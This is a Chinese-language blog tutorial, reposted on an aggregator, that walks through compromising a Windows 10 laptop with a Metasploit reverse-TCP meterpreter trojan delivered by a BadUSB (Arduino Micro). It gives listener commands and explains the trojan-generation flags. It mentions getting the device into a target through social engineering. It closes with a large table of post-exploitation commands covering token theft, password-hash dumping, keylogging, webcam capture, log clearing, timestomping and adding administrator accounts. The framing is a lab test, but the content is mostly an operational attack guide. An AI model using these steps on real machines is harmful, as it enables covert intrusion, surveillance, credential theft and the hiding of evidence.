基于msf与badusb的笔记本电脑渗透测试(详解)
生活随笔
收集整理的這篇文章主要介紹了
基于msf与badusb的笔记本电脑渗透测试(详解)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
文章目錄
- 1. msf部分
- 1.1 生成木馬文件
- 1.2 配置監聽環境
- 2. Badusb部分
- 2.1 收集數據
- 2.2 編寫腳本并上傳
- 3. 配置局域網環境
- 3.1 創建局域網環境
- 3.2 設置共享文件夾
- 4. 開始攻擊
- 4.1 開始監聽
- 4.2 近源滲透
- 4.3 完成攻擊
所需工具:windows10主機,windows10靶機,kali 2020.01虛擬機,Badusb(這里我用的是Arduino Micro的板子),EP-N8508GS無線網卡
1. msf部分
1.1 生成木馬文件
首先利用kali中的msf生成木馬文件
注:這里用的是最簡單的方法。木馬非免殺,若需深入,可以參考Metasploit 整理筆記
其中:
- -p:產生一個payload;
- windows/meterpreter/reverse_tcp:是指windows下的一個tcp漏洞;
- -e x86/shikata_ga_nai:這是編碼方式;
- -i 5:編碼次數;
- -b ‘\x00’:避免運行時會出現的值;
- LHOST:kali虛擬機的IP(通過ifconfig查找);
- LPORT:填寫自己的端口;
- -f exe:生成.exe的可執行文件;
- door.exe:文件名.exe。
1.2 配置監聽環境
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST xxx.xxx.xxx.xxx set LPORT xxxxx show options exploit-
msfconsole 是打開msf的指令(如下圖)
-
LHOST和LPORT還是填之前木馬文件中的IP和端口號(如下)
2. Badusb部分
2.1 收集數據
由于只是一次滲透測試,所以我只是將木馬放在了主機的共享文件夾中。因此只需收集主機的IP地址即可(通過ipconfig查找)。
2.2 編寫腳本并上傳
根據之前收集到的信息,我們可以在Arduino IDE中進行腳本的編寫(在Microsoft Storek中可免費下載):
- Keyboard.begin() 開始;
- Keyboard.press() 按下按鍵;
- Keyboard.release() 松開按鍵;
注:Keyboard.press()與Keyboard.release()必須成對出現! - Keyboard.print() 輸入文本;
- Keyboard.println() 輸入文本并回車;
- Keyboard.releaseAll() 釋放所有按鍵;
- Keyboard.end() 結束;
- delay() 延時(單位為毫秒)。
驗證通過后開始上傳
注意:腳本上傳后會在電腦上運行一遍,注意使用文本編輯器吸收按鍵。
| KEY_LEFT_CTRL |
| KEY_LEFT_SHIFT |
| KEY_LEFT_ALT |
| KEY_LEFT_GUI |
| KEY_RIGHT_CTRL |
| KEY_RIGHT_SHIFT |
| KEY_RIGHT_ALT |
| KEY_RIGHT_GUI |
| KEY_UP_ARROW |
| KEY_DOWN_ARROW |
| KEY_LEFT_ARROW |
| KEY_RIGHT_ARROW |
| KEY_BACKSPACE |
| KEY_TAB |
| KEY_RETURN |
| KEY_ESC |
| KEY_INSERT |
| KEY_DELETE |
| KEY_PAGE_UP |
| KEY_PAGE_DOWN |
| KEY_HOME |
| KEY_END |
| KEY_CAPS_LOCK |
| KEY_F1 |
| KEY_F2 |
| KEY_F3 |
| KEY_F4 |
| KEY_F5 |
| KEY_F6 |
| KEY_F7 |
| KEY_F8 |
| KEY_F9 |
| KEY_F10 |
| KEY_F11 |
| KEY_F12 |
3. 配置局域網環境
3.1 創建局域網環境
我們使用WIFI搭建局域網,由于虛擬機沒有內設無線網卡,所以需要外接無線網卡。這里我選用的是EP-N8508GS無線網卡(之前玩無線的時候買的,具有偵聽功能)。
3.2 設置共享文件夾
將木馬文件放入一個空的文件夾中,并將其配置為共享文件夾:
4. 開始攻擊
4.1 開始監聽
在kali上的msf中鍵入exploit開始監聽
4.2 近源滲透
將Badusb插入靶機中(實戰中可以通過社工的方法),等待其開始木馬。
注:不同機型可能會出現不同情況,可視情況修改Arduino腳本
4.3 完成攻擊
當出現如上顯示時,就意味著靶機已在你的掌控之下,之后便可通過指令對其進行操控:
| help | 查看幫助 |
| run scriptname | 運行腳本 |
| sysinfo | 系統基本信息 |
| ls | 列目錄 |
| use priv | 運行提權組件 |
| ps | 列進程 |
| migrate PID | PID 遷移 |
| use incognito token | 竊取 |
| list_tokens -u | 查看可用用戶token |
| list_tokens -g | 查看可用組token |
| impersonate_token DOMAIN_NAME\USERNAME | 模仿token |
| steal_token PID | 竊取PID 所屬token 并模仿 |
| drop_token | 停止模仿token |
| getsystem | 獲取SYSTEM 權限 |
| shell | 運行shell |
| execute -f cmd.exe -i | 交互式運行cmd |
| execute -f cmd.exe -i -t | 使用可用token 運行 |
| execute -f cmd.exe -i -H -t | 同上,同時隱藏進程 |
| rev2self | 返回至初始用戶 |
| reg command | 修改注冊表 |
| setkesktop number | 切換至另一已登錄用戶屏幕 |
| screenshot | 截屏 |
| upload file | 上傳文件 |
| download file | 下載文件 |
| keyscan_start | 開始截取擊鍵記錄 |
| keyscan_stop | 停止截取擊鍵記錄 |
| getprivs | 盡可能提升權限 |
| uictl disable/enable keyboard/mouse | 獲取鍵盤或鼠標的控制權 |
| background | 將當前meterpreter shell 轉入后臺 |
| hashdump | 導出所有用戶hash |
| use sniffer | 加載嗅探模塊 |
| sniffer_interfaces | 查看可用網卡接口 |
| sniffer_dump interfaceID pcapname | 開始嗅探 |
| sniffer_start interfaceID packet-buffer | 指定buffer 范圍嗅探 |
| sniffer_stats interfaceID | 抓取統計信息 |
| sniffer_stop interfaceID | 停止嗅探 |
| add_user username password -h ip | 添加用戶 |
| add_group_user “Domain Admins” username -h ip | 添加用戶至管理組 |
| clearev | 清空日志 |
| timestomp | 改變文件屬性如創建時間等 |
| reboot | 重啟 |
| webcam_list | 查看攝像頭 |
| webcam_snap | 通過攝像頭拍照 |
| webcam_stream | 通過攝像頭開啟視頻 |
總結
以上是生活随笔為你收集整理的基于msf与badusb的笔记本电脑渗透测试(详解)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java回顾:MyBatis开发、配置、
- 下一篇: nodejs 解析Android apk